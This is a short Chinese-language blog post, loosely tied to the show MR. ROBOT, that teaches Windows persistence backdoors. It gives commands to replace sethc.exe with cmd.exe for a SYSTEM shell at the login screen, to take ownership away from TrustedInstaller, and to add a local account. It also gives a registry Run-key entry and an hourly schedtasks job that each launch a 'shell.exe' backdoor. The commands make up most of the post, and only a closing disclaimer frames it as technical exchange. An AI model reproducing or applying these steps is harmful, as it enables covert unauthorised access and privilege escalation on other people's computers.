来源:《MR.ROBOT》
不知该写什么内容了,再刷了遍《heike军团》内的片段拿来说一下吧!
粘滞键后门 在windows上连续按5次“Shift”,就可以调出粘滞键;
粘滞键指的是电脑使用中的一种快捷键,专为同时按下两个或多个键有困难的人而设计的。粘滞键的主要功能是方便Shift等键的组合使用。粘滞键可以先按一个键位(如shift),再按另一键位,而不是同时按下两个键位,方便某些因身体原因而无法同时按下多键的人。一般的电脑连按五次shift会出现粘滞键提示;
使用如下命令:
cd c:windows\system32move sethc.exe sethc.exe.bakcopy cmd.exe sethc.exe
如果目标机是 winvista 以上的,即 winvista 以后出的系统,修改 sethc 会提示需要 Trustedinstaller 权限,所以想要继续,那就需要修改所有者为Administrator,并修改其权限:
然后修改为完全控制;
现在我们连续按下5次shift就弹出一个system权限的cmd;
net user 账户名 密码 /add #添加一个带有密码的账户,登录新添加的账户即可访问该计算机
注册表注入后门 在普通用户权限下,攻击者将会需要执行的后门程序或者脚本路径写到注册表;
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
键值可以任意设置,或者直接执行如下命令添加启动项 ;
REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v test /t REG_SZ /d "C:\shell.exe"
当管理员重新登录系统时,就会执行后门程序;
计划任务后门 :
命令:schtasks /Create /tn Updater /tr c:\shell.exe /sc hourly /mo 1
以上的命令会在每小时执行一次shell.exe,在win7及以下的系统使用at命令代替schtasks。以上所有内容来源于网络,仅做技术交流,如侵权告知删除,点击查看免责声明!